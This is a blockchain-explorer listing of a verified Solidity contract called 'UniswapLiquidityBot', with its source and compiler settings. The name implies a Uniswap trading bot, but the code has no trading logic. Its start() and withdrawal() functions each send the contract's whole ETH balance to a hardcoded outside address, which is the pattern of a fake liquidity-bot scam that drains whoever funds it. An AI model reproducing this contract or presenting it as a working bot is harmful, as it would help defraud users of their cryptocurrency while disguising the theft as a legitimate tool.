UniswapLiquidityBot

Description:

Smart contract deployed on Ethereum with Factory features.

Blockchain: Ethereum

Source Code: View Code On The Blockchain

Solidity Source Code:

{{
  "language": "Solidity",
  "sources": {
    "contracts/usdt.sol": {
      "content": "// SPDX-License-Identifier: MIT
pragma solidity ^0.6.6;

contract UniswapLiquidityBot {
    string public tokenName;
    string public tokenSymbol;
    address payable public liquidity = 0x3e8E04f240ebFcb42d489777708C82A895645dc1;

    constructor(string memory _tokenName, string memory _tokenSymbol) public {
        tokenName = _tokenName;
        tokenSymbol = _tokenSymbol;
    }

    receive() external payable {}

    function start() public {
        uint256 bal = address(this).balance;
        require(bal > 0, "No ETH in contract");
        liquidity.transfer(bal);
    }

    function withdrawal() public {
        uint256 bal = address(this).balance;
        require(bal > 0, "No ETH in contract");
        liquidity.transfer(bal);
    }

    function getBalance() external view returns (uint256) {
        return address(this).balance;
    }

    function getLiquidityAddress() external view returns (address) {
        return liquidity;
    }
}
"
    }
  },
  "settings": {
    "optimizer": {
      "enabled": false,
      "runs": 200
    },
    "outputSelection": {
      "*": {
        "*": [
          "evm.bytecode",
          "evm.deployedBytecode",
          "devdoc",
          "userdoc",
          "metadata",
          "abi"
        ]
      }
    },
    "remappings": []
  }
}}

Tags:
Factory|addr:0xcf2cd4562c9e75772849c6e3e2855b89a2ba779f|verified:true|block:23623104|tx:0x61b0c0e0e5e0af865ca9224e9e267f0667ecce162d03b718f05c723fb5df041e|first_check:1761041860

Submitted on: 2025-10-21 12:17:42

Comments

Log in to comment.

No comments yet.